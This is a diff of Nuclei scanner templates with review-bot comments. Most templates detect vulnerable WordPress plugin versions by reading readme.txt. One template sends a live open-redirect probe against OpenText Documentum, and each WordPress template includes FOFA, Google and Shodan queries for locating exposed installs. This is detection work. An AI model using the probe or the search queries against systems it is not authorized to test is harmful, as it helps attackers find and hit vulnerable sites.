@@ -0,0 +1,59 @@ +id: CVE-2024-7857-a18aa7c9dff5c4191bbf30ebf29a07a1 + +info: + name: > + Media Library Folders <= 8.2.2 - Authenticated (Subscriber+) Second-Order SQL Injection + author: topscoder + severity: low + description: > + The Media Library Folders plugin for WordPress is vulnerable to second order SQL Injection via the 'sort_type' parameter of the 'mlf_change_sort_type' AJAX action in all versions up to, and including, 8.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d2266254-9281-4859-8630-f7bb5c0ead19?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-7857 + metadata: + fofa-query: "wp-content/plugins/media-library-plus/" + google-query: inurl:"/wp-content/plugins/media-library-plus/" + shodan-query: 'vuln:CVE-2024-7857' + tags: cve,wordpress,wp-plugin,media-library-plus,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/media-library-plus/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "media-library-plus" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.2.2') \ No newline at end of file 
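Review bot: `severity: low` and the `low` tag are wrong for a template carrying `cvss-score: 9.8`; set `severity: critical` and `tags: cve,wordpress,wp-plugin,media-library-plus,critical`. As in the name, the issue requires Subscriber-level access, yet the vector says `PR:N` — with `PR:L` it would be 8.8, so the vector or the title needs correcting against the advisory. The template is version-only (readme `Stable tag` <= 8.2.2) and does not exercise the `mlf_change_sort_type` AJAX action.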
diff --git a/poc/cve/CVE-2024-7863.yaml b/poc/cve/CVE-2024-7863.yaml new file mode 100644 index 0000000000..400de8ae0d --- /dev/null +++ b/poc/cve/CVE-2024-7863.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7863 + +info: + name: > + Favicon Generator <= 1.5 - Cross-Site Request Forgery to Arbitrary File Upload + author: topscoder + severity: medium + description: > + The Favicon Generator plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the output_sub_admin_page_0 function. This makes it possible for unauthenticated attackers to upload arbitrary files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The plugin author deleted the functionality of the plugin to patch this issue and close the plugin, we recommend seeking an alternative to this plugin. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9df24b5e-109e-43ae-b55b-8514281a631f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7863 + metadata: + fofa-query: "wp-content/plugins/favicon-generator/" + google-query: inurl:"/wp-content/plugins/favicon-generator/" + shodan-query: 'vuln:CVE-2024-7863' + tags: cve,wordpress,wp-plugin,favicon-generator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/favicon-generator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "favicon-generator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5') \ No newline at end of file 
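Review bot: `severity: medium` does not match `cvss-score: 8.8` (high band) for a CSRF that ends in arbitrary file upload; use `severity: high` and `tags: cve,wordpress,wp-plugin,favicon-generator,high`. Since the description says the plugin was closed and its upload functionality removed rather than fixed, the `<= 1.5` check is effectively "any install still running the old code", which is worth saying in `description` so the remediation advice (replace the plugin) is clear to whoever triages the hit.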
diff --git a/poc/cve/CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e.yaml b/poc/cve/CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e.yaml new file mode 100644 index 0000000000..6754f49986 --- /dev/null +++ b/poc/cve/CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e + +info: + name: > + Beaver Builder (Lite Version) <= 2.8.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via type Parameter + author: topscoder + severity: low + description: > + The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘type’ parameter in all versions up to, and including, 2.8.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f83db067-843f-4dd8-b5d1-83e95c6c88cc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-7895 + metadata: + fofa-query: "wp-content/plugins/beaver-builder-lite-version/" + google-query: inurl:"/wp-content/plugins/beaver-builder-lite-version/" + shodan-query: 'vuln:CVE-2024-7895' + tags: cve,wordpress,wp-plugin,beaver-builder-lite-version,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/beaver-builder-lite-version/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beaver-builder-lite-version" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.3.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8030.yaml b/poc/cve/CVE-2024-8030.yaml new file mode 100644 index 0000000000..cfc81b9b28 
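Review bot: `severity: low` and the `low` tag disagree with `cvss-score: 6.4`, which is medium under CVSS 3.1; set `severity: medium` and `tags: cve,wordpress,wp-plugin,beaver-builder-lite-version,medium`. The two `version` extractors (one `internal: true`, one not) share a name and the same regex; one non-internal named extractor appears sufficient for both the `compare_versions` DSL and output, so the duplicate looks redundant — worth confirming against the nuclei version this repo targets before keeping it.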
--- /dev/null +++ b/poc/cve/CVE-2024-8030.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8030 + +info: + name: > + Ultimate Store Kit Elementor Addons, Woocommerce Builder, EDD Builder, Elementor Store Builder, Product Grid, Product Table, Woocommerce Slider <= 2.0.3 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The Ultimate Store Kit Elementor Addons, Woocommerce Builder, EDD Builder, Elementor Store Builder, Product Grid, Product Table, Woocommerce Slider plugin is vulnerable to PHP Object Injection via deserialization of untrusted input via the _ultimate_store_kit_wishlist cookie in versions up to , and including, 2.0.3. This makes it possible for an unauthenticated attacker to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker or above to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ef566dca-91ed-4929-b36b-4e424e07e1d4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-8030 + metadata: + fofa-query: "wp-content/plugins/ultimate-store-kit/" + google-query: inurl:"/wp-content/plugins/ultimate-store-kit/" + shodan-query: 'vuln:CVE-2024-8030' + tags: cve,wordpress,wp-plugin,ultimate-store-kit,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-store-kit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-store-kit" + part: body + + - 
type: dsl + dsl: + - compare_versions(version, '<= 2.0.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml b/poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml new file mode 100644 index 0000000000..c0b554b2dc --- /dev/null +++ b/poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml 
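Review bot: `severity: critical` is consistent with the 9.8 score, but the description itself says no POP chain exists in this plugin, so a readme-only `<= 2.0.3` match is "deserialization sink present", not "RCE confirmed"; add a sentence to `description` noting the template is version-based and that impact depends on a gadget chain from another installed plugin or theme. The `_ultimate_store_kit_wishlist` cookie named in the description is never sent, so nothing here exercises the vulnerable path. The description also carries a copy error ("allow the attacker or above") that should be fixed when the text is touched.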
@@ -0,0 +1,59 @@ +id: CVE-2024-8043-613641adfae0294950a0fa915c4316f4 + +info: + name: > + Vikinghammer Tweet <= 0.2.4 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Vikinghammer Tweet plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.2.4. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d0598341-0088-42bf-9a34-794c941a848d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8043 + metadata: + fofa-query: "wp-content/plugins/vikinghammer-tweet/" + google-query: inurl:"/wp-content/plugins/vikinghammer-tweet/" + shodan-query: 'vuln:CVE-2024-8043' + tags: cve,wordpress,wp-plugin,vikinghammer-tweet,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/vikinghammer-tweet/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "vikinghammer-tweet" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.2.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml b/poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml new file mode 100644 index 0000000000..a081b7443f 
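Review bot: The `matchers-condition: and` chain depends on `version` being populated, and the extractor only accepts `Stable tag: ([0-9.]+)`; a readme that publishes a non-numeric tag (plugins sometimes ship `Stable tag: trunk`) leaves `version` empty, the `compare_versions` DSL fails, and the install is reported clean even though the plugin is present. Consider reporting the plugin's presence separately (status + slug word match) from the version verdict, or at least documenting this gap in `description`. Note the check is readme-only and does not verify the missing nonce.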
--- /dev/null +++ b/poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b + +info: + name: > + infolinks Ad Wrap <= 1.0.2 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The infolinks Ad Wrap plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1ee41498-f5c6-48c3-a0db-55a1fe6e7f92?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8044 + metadata: + fofa-query: "wp-content/plugins/infolinks-ad-wrap/" + google-query: inurl:"/wp-content/plugins/infolinks-ad-wrap/" + shodan-query: 'vuln:CVE-2024-8044' + tags: cve,wordpress,wp-plugin,infolinks-ad-wrap,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/infolinks-ad-wrap/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "infolinks-ad-wrap" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file 
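Review bot: The description and title describe a CSRF against a settings handler, but the template only reads `readme.txt` and compares `Stable tag` to `<= 1.0.2`; a practitioner reading the result will assume the nonce check was tested. Add a line to `description` such as "Detection is version-based only; the settings endpoint is not exercised" so the finding is triaged as a version match. Severity (`medium`) is consistent with the 4.3 score here.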
diff --git a/poc/cve/CVE-2024-8047-f6817d306b4651cd60631b6b036a3959.yaml b/poc/cve/CVE-2024-8047-f6817d306b4651cd60631b6b036a3959.yaml new file mode 100644 index 0000000000..8704e29546 --- /dev/null +++ b/poc/cve/CVE-2024-8047-f6817d306b4651cd60631b6b036a3959.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8047-f6817d306b4651cd60631b6b036a3959 + +info: + name: > + Visual Sound (old) <= 1.06 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The Visual Sound (old) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.06. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3595f1c7-22a5-46c6-b81f-fe616a71116f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8047 + metadata: + fofa-query: "wp-content/plugins/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams/" + google-query: inurl:"/wp-content/plugins/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams/" + shodan-query: 'vuln:CVE-2024-8047' + tags: cve,wordpress,wp-plugin,visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.06') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml b/poc/cve/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml new file mode 100644 index 0000000000..6acd3dbd1f --- /dev/null +++ b/poc/cve/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab + +info: + name: > + Special Feed Items <= 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Special Feed Items plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5a54d1d-3593-4ba1-a747-651278488be6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8051 + metadata: + fofa-query: "wp-content/plugins/special-feed-items/" + google-query: inurl:"/wp-content/plugins/special-feed-items/" + shodan-query: 'vuln:CVE-2024-8051' + tags: cve,wordpress,wp-plugin,special-feed-items,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/special-feed-items/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "special-feed-items" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8052-e7604b09bc8937658ab6d84d35011faf.yaml b/poc/cve/CVE-2024-8052-e7604b09bc8937658ab6d84d35011faf.yaml new file mode 100644 index 0000000000..1aa0c50461 
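Review bot: The `word` matcher requires the slug `special-feed-items` to appear in the body of `readme.txt`, but a plugin readme normally carries the display name ("Special Feed Items") rather than the directory slug, so the `and` chain may never match on a real install — this needs confirming against the plugin's actual readme before the template is trusted for negatives. If the slug is absent, match on the display name or drop the word matcher and rely on status plus the `Stable tag` extraction. The check remains version-only and does not test the CSRF itself.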
--- /dev/null +++ b/poc/cve/CVE-2024-8052-e7604b09bc8937658ab6d84d35011faf.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8052-e7604b09bc8937658ab6d84d35011faf + +info: + name: > + Review Ratings <= 1.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Review Ratings plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update plugin settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8f890790-c5ca-4812-9566-6c945d8f39b5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8052 + metadata: + fofa-query: "wp-content/plugins/ratings-shorttags/" + google-query: inurl:"/wp-content/plugins/ratings-shorttags/" + shodan-query: 'vuln:CVE-2024-8052' + tags: cve,wordpress,wp-plugin,ratings-shorttags,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ratings-shorttags/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ratings-shorttags" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml b/poc/cve/CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml new file mode 100644 index 0000000000..abe36d939a --- /dev/null +++ b/poc/cve/CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37 + +info: + name: > + Enhanced Search Box <= 0.6.1 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The Enhanced Search Box plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.6.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/13fb8d16-2904-4c04-9ea6-5bafdf30f563?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8091 + metadata: + fofa-query: "wp-content/plugins/extended-search-plugin/" + google-query: inurl:"/wp-content/plugins/extended-search-plugin/" + shodan-query: 'vuln:CVE-2024-8091' + tags: cve,wordpress,wp-plugin,extended-search-plugin,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/extended-search-plugin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "extended-search-plugin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.6.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8195.yaml b/poc/cve/CVE-2024-8195.yaml new file mode 100644 index 0000000000..e4ea22e6e1 --- /dev/null +++ b/poc/cve/CVE-2024-8195.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8195 + +info: + name: > + Permalink Manager Lite <= 2.4.4 - Missing Authorization to Unauthenticated Sensitive Information Exposure + author: topscoder + severity: high + description: > + The Permalink Manager Lite plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'debug_data', 'debug_query', and 'debug_redirect' functions in all versions up to, and including, 2.4.4. This makes it possible for unauthenticated attackers to extract sensitive data including password, title, and content of password-protected posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aadf1d59-60ba-4da2-adbb-4e84d587a34d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-8195 + metadata: + fofa-query: "wp-content/plugins/permalink-manager/" + google-query: inurl:"/wp-content/plugins/permalink-manager/" + shodan-query: 'vuln:CVE-2024-8195' + tags: cve,wordpress,wp-plugin,permalink-manager,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/permalink-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "permalink-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.4') \ No newline at end of file diff --git a/poc/cve/cve-2016-6210.yaml b/poc/cve/cve-2016-6210.yaml index 0cf11fcf80..668fd715ec 100644 --- a/poc/cve/cve-2016-6210.yaml +++ b/poc/cve/cve-2016-6210.yaml 
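Review bot: `severity: high` and the `high` tag overstate a template whose own `cvss-score` is 5.3 (C:L/I:N/A:N, medium band); set `severity: medium` and `tags: cve,wordpress,wp-plugin,permalink-manager,medium` so filtering and reporting agree with the score. The description names the unauthenticated `debug_data`/`debug_query`/`debug_redirect` functions, yet the template only fetches `readme.txt` and compares `Stable tag` to `<= 2.4.4`; say so in `description`, since an unauthenticated information-exposure check is exactly the kind of thing a user will expect to have been probed directly.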
@@ -1,9 +1,10 @@ id: CVE-2016-6210 + info: name: OpenSSH username enumeration < v7.3 author: iamthefrogy,forgedhallpass severity: medium - tags: cve,cve2016,network,openssh + description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 @@ -15,15 +16,18 @@ info: cvss-score: 5.9 cve-id: CVE-2016-6210 cwe-id: CWE-200 + network: - host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' + extractors: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file diff --git a/poc/cve/cve-2017-14524.yaml b/poc/cve/cve-2017-14524.yaml index e87149510b..20a95213bc 100644 --- a/poc/cve/cve-2017-14524.yaml +++ b/poc/cve/cve-2017-14524.yaml 
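Review bot: The first hunk replaces the `tags: cve,cve2016,network,openssh` line with the new `description:` line instead of keeping both, so the template now has no tags at all and will no longer be selected by `-tags network` or `-tags openssh`; re-add `tags: cve,cve2016,network,openssh` after `description`. While touching this file, the unchanged matcher regex ends in `[\n^\r]+`, which looks like a transposed `[^\r\n]+` (the extractor on the next lines uses the correct form) — it is pre-existing, but worth fixing in the same pass.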
@@ -1,25 +1,43 @@ id: CVE-2017-14524 + info: - name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect + name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect author: 0x_Akoko - severity: low - description: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks. + severity: medium + description: | + OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. + remediation: | + Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. reference: - https://seclists.org/fulldisclosure/2017/Sep/57 - - https://www.cvedetails.com/cve/CVE-2017-14524 - - https://vuldb.com/?id.107201 - tags: cve,cve2017,redirect,opentext + - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14524 + - http://seclists.org/fulldisclosure/2017/Sep/57 + - https://github.com/ARPSyndicate/cvemon classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2017-14524 cwe-id: CWE-601 -requests: + epss-score: 0.00258 + epss-percentile: 0.6357 + cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: opentext + product: documentum_administrator + tags: cve2017,cve,redirect,opentext,seclists + +http: - method: GET path: - - '{{BaseURL}}/xda/help/en/default.htm?startat=//example.com' + - 
'{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me' + matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' +# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-1271.yaml b/poc/cve/cve-2018-1271.yaml index ccf03eab13..548327e206 100644 --- a/poc/cve/cve-2018-1271.yaml +++ b/poc/cve/cve-2018-1271.yaml 
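Review bot: The new `reference` list carries the same seclists post twice (`https://seclists.org/fulldisclosure/2017/Sep/57` and `http://seclists.org/fulldisclosure/2017/Sep/57`); keep one. The appended `# digest:` trailer is a signature over the exact file bytes, so any local edit in this fork — including removing that duplicate — will leave a digest that no longer verifies; either drop the trailer in copied templates or re-sign after editing. Also note the vector label changed from `CVSS:3.1` to `CVSS:3.0` with the same metrics, which is the opposite direction from the `cve-2018-1271.yaml` change in this commit; pick one source (NVD) for the version tag and apply it consistently.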
